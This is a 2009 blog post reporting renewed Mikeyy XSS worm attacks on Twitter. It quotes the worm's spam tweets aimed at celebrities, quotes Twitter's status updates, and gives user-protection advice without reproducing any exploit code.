Twitter Attacks Renewed

I am disappointed, but not surprised, that Twitter has once again come under XSS attack. Earlier today, a modified version of the Mikeyy worm resurfaced.

Today's attack was a little different. The script came from the same location but instead of being of general nuisance value, this one has directly targeted well-known Twitter users. The messages included:

Twitter, this sucks! Fix your coding.
Twitter Security Team Really? You need to be fired.
Horrible Coding!
@oprah - sup? welcome to twitter. - mikeyy
@aplusk - hey, homo. - mikeyy
@souljaboytellem - your music sucks dude. - mikeyy
@TheEllenShow - hey baby, love me long time? - mikeyy
@StephenColbert - you funny. - mikeyy
@cnnbrk - he's back. - mikeyy
@nytimes - yep, it's true. - mikeyy
Twitter, do you know about the before_save model callback? - mikeyy
This exploit only affects Internet Explorer users. Thanks. - mikeyy
Twitter, BeforeSave: ForEach: DataArray: EscapeHtmlChars!!! - mikeyy
Get Firefox, thanks. www.Firefox.com
Twitter, you should be paying me now. - mikeyy

This is a nasty change in the script, which is specifically targeting individual tweeters now. Like before, some of the tweets are designed to appear benign and have clearly fooled users into re-tweeting and clicking on profiles. Of more serious concern is that the attack script appears to have been targeting Internet Explorer users and attempts to create ActiveXObjects, which raises concerns that the script may be morphing into something that may harm local computers.

In contrast to the earlier attacks, Twitter has been keeping users somewhat informed this time. Only a few hours after the latest worm started to spread the Twitter Status showed:

We are currently addressing a new variant of the Mikeyy worm. Please avoid viewing the profiles of users posting uncharacteristic or otherwise suspicious tweets.

Followed three hours later by this message:

We’re aware of the ongoing spam attack happening on Twitter and we’re working to bring it under control.

@spam, the Twitter spam account displayed an update indicating that the latest XSS attack is under control.

JavaScript XSS Attack Vectors are Dangerous

Last week, I posted a guide to how to protect yourself from the StalkDaily/Mikeyy worm in my post called StalkDaily Twitter XSS - Lessons Learned.

The same advice applies to the latest variant and will probably protect you from most future variants as well.

UPDATE

19th April, 2009

This is getting repetitive and boring! Today, the Mikeyy script morphed again and bombarded Twitter streams with jokes. This is, however, no joke. All the wormy messages ended with, "Womp. mikeyy" and, as usual, thousands of people re-tweeted these inane tweets.

A few hours ago, Twitter's @spam reported:

Currently, everything seems under control; we still recommend not clicking on suspicious links as a general practice.

Twitter's idea of getting things under control seems to be simply a case of cleaning up the latest XSS attack without actually closing the holes.

What to do if your Twitter account appears to have been hacked?

Twitter has posted information here. If your profile has been hacked by these Mikeyy attacks and you are having difficulty cleaning it, go to Twitter Help and open a support ticket.

20th April, 2009

Here we go again! For information about the latest worm, please see "Mikey and the Mysterious Treqz" on the F-Secure blog. I've lost patience with Mikeyy and Twitter's inability to close these holes.

Stay safe and do NOT visit Twitter user profiles with scripting enabled in your browser!

If you enjoyed this post, make sure you subscribe to my RSS feed!